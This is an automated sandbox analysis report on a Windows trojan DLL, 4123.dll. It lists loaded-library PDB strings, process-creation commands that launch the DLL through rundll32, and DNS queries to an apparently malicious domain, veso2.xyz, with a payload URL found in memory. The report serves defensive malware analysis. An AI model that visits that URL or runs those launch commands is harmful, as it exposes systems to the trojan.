Source: Binary string: winspool.pdbr source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: winspool.pdbo source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdbt source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000008.00000003.636714132.000000000338C000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.642523716.000000000338A000.00000004.00000001.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000008.00000003.641942201.00000000059C0000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642409344.0000000000AB0000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651140195.00000000056B0000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb{ source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 00000008.00000003.641867150.00000000057F1000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.642348712.0000000004E81000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.650931846.00000000056E1000.00000004.00000001.sdmp
Source: Binary string: dhcpcsvc.pdb} source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdbn source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp

Networking:

barindex
Performs DNS queries to domains with low reputationShow sources
Source: C:\Windows\SysWOW64\rundll32.exeDNS query: veso2.xyz
Source: C:\Windows\SysWOW64\rundll32.exeDNS query: veso2.xyz
Source: C:\Windows\SysWOW64\rundll32.exeDNS query: veso2.xyz
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04851640 wsprintfA,WSAStartup,socket,gethostbyname,htons,connect,send,recv,closesocket,WSACleanup,3_2_04851640
Source: unknownDNS traffic detected: queries for: veso2.xyz
Source: WerFault.exe, 00000009.00000003.655034598.0000000004A3A000.00000004.00000001.sdmpString found in binary or memory: http://crl.microsoft
Source: WerFault.exe, 0000000C.00000003.697579137.0000000005109000.00000004.00000001.sdmpString found in binary or memory: http://crl.microsoftH
Source: rundll32.exe, rundll32.exe, 0000000A.00000002.701579769.0000000000AAB000.00000004.00000010.sdmpString found in binary or memory: http://veso2.xyz/campo/r/r1
Source: rundll32.exe, 00000003.00000002.662513941.00000000011A4000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.668070742.0000000003372000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.667384317.0000000001150000.00000040.00000001.sdmp, rundll32.exe, 0000000A.00000002.703520436.00000000011B2000.00000002.00000001.sdmpString found in binary or memory: http://veso2.xyz/campo/r/r1C:
Source: rundll32.exe, 00000003.00000002.660720123.000000000090B000.00000004.00000010.sdmpString found in binary or memory: http://veso2.xyz/campo/r/r1F

System Summary:

barindex
Rundll32 performs DNS lookup (likely malicious behavior)Show sources
Source: C:\Windows\SysWOW64\rundll32.exeDNS query: name: veso2.xyz
Source: C:\Windows\SysWOW64\rundll32.exeDNS query: name: veso2.xyz
Source: C:\Windows\SysWOW64\rundll32.exeDNS query: name: veso2.xyz
Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\Windows\AppCompat\Programs\Amcache.hve.tmpJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100011403_2_10001140
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7132 -s 1008
Source: 4123.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 4123.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 4123.dllStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
Source: classification engineClassification label: mal80.troj.evad.winDLL@12/15@3/1
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7120
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7132
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5752
Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERA0B3.tmpJump to behavior
Source: 4123.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\4123.dll,DF1
Source: 4123.dllVirustotal: Detection: 55%
Source: 4123.dllReversingLabs: Detection: 62%
Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\4123.dll'
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\4123.dll',#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\4123.dll,DF1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\4123.dll',#1
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7132 -s 1008
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7120 -s 1008
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\4123.dll',DF1
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5752 -s 1008
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\4123.dll',#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\4123.dll,DF1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\4123.dll',DF1Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\4123.dll',#1Jump to behavior
Source: Binary string: cryptbase.pdbP source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: pnrpnsp.pdbY source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: rsaenh.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdb6 source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000008.00000003.636944028.0000000003386000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.636727331.0000000002DD7000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.642877334.00000000051BB000.00000004.00000001.sdmp
Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000008.00000003.641893367.00000000059C1000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642363725.0000000000AB1000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651005092.00000000056B1000.00000004.00000040.sdmp
Source: Binary string: NapiNSP.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000008.00000003.641867150.00000000057F1000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.642348712.0000000004E81000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.650931846.00000000056E1000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000008.00000003.641942201.00000000059C0000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642409344.0000000000AB0000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651140195.00000000056B0000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000008.00000003.636702692.0000000003380000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.637261679.0000000002DD1000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.642507283.000000000337E000.00000004.00000001.sdmp
Source: Binary string: winnsi.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: cryptsp.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000008.00000003.641942201.00000000059C0000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642409344.0000000000AB0000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651140195.00000000056B0000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdb* source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: dwmapi.pdb, source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdbS source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: msctf.pdb_ source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: rasadhlp.pdbq source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000008.00000003.636714132.000000000338C000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.637048796.0000000002DDD000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.642523716.000000000338A000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: mpr.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdb} source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: shcore.pdbk source: WerFault.exe, 00000008.00000003.641954637.00000000059C4000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642418429.0000000000AB4000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651005092.00000000056B1000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb& source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: msvcp60.pdb? source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: winspool.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: shell32.pdbk source: WerFault.exe, 00000008.00000003.641893367.00000000059C1000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642363725.0000000000AB1000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651005092.00000000056B1000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb} source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: rsaenh.pdb6 source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdbt source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: nsi.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000008.00000003.641893367.00000000059C1000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642363725.0000000000AB1000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651005092.00000000056B1000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: propsys.pdbh source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: NapiNSP.pdbc source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000008.00000003.641867150.00000000057F1000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.642348712.0000000004E81000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.650931846.00000000056E1000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdbB source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdbe source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: userenv.pdbe source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: dpapi.pdb? source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000008.00000003.641893367.00000000059C1000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642418429.0000000000AB4000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651005092.00000000056B1000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000008.00000003.641942201.00000000059C0000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642409344.0000000000AB0000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651140195.00000000056B0000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: winnsi.pdbh source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: msvcp60.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000008.00000003.636944028.0000000003386000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.643200294.0000000003384000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdb source: WerFault.exe, 00000008.00000002.658372686.00000000035C0000.00000002.00000001.sdmp, WerFault.exe, 00000009.00000002.656286484.00000000009C0000.00000002.00000001.sdmp, WerFault.exe, 0000000C.00000002.698870871.0000000003430000.00000002.00000001.sdmp
Source: Binary string: sfc.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: dpapi.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000008.00000003.641867150.00000000057F1000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.642348712.0000000004E81000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.650931846.00000000056E1000.00000004.00000001.sdmp
Source: Binary string: wimm32.pdbZ source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: profapi.pdb\ source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdbU source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: rasadhlp.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdb0 source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: winnsi.pdbW source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: cryptsp.pdbr source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdb8 source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: sechost.pdbI source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: pnrpnsp.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdbq source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: lbase.pdb source: WerFault.exe, 00000009.00000003.636822779.0000000004A2D000.00000004.00000001.sdmp
Source: Binary string: cryptsp.pdb{ source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc6.pdbS source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdbGCTL source: WerFault.exe, 00000008.00000002.658372686.00000000035C0000.00000002.00000001.sdmp, WerFault.exe, 00000009.00000002.656286484.00000000009C0000.00000002.00000001.sdmp, WerFault.exe, 0000000C.00000002.698870871.0000000003430000.00000002.00000001.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000008.00000003.641954637.00000000059C4000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642418429.0000000000AB4000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651005092.00000000056B1000.00000004.00000040.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000008.00000003.641867150.00000000057F1000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.642348712.0000000004E81000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.650931846.00000000056E1000.00000004.00000001.sdmp
Source: Binary string: combase.pdbD source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: combase.pdbF source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 00000008.00000003.641893367.00000000059C1000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642363725.0000000000AB1000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651005092.00000000056B1000.00000004.00000040.sdmp
Source: Binary string: nsi.pdb{ source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb* source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000008.00000003.641867150.00000000057F1000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.642348712.0000000004E81000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.650931846.00000000056E1000.00000004.00000001.sdmp
Source: Binary string: sechost.pdb8 source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: dnsapi.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: userenv.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000008.00000003.641867150.00000000057F1000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.642348712.0000000004E81000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.650931846.00000000056E1000.00000004.00000001.sdmp
Source: Binary string: setupapi.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: nlaapi.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdbf source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: l32.pdb source: WerFault.exe, 00000009.00000003.636822779.0000000004A2D000.00000004.00000001.sdmp
Source: Binary string: dhcpcsvc6.pdb5 source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
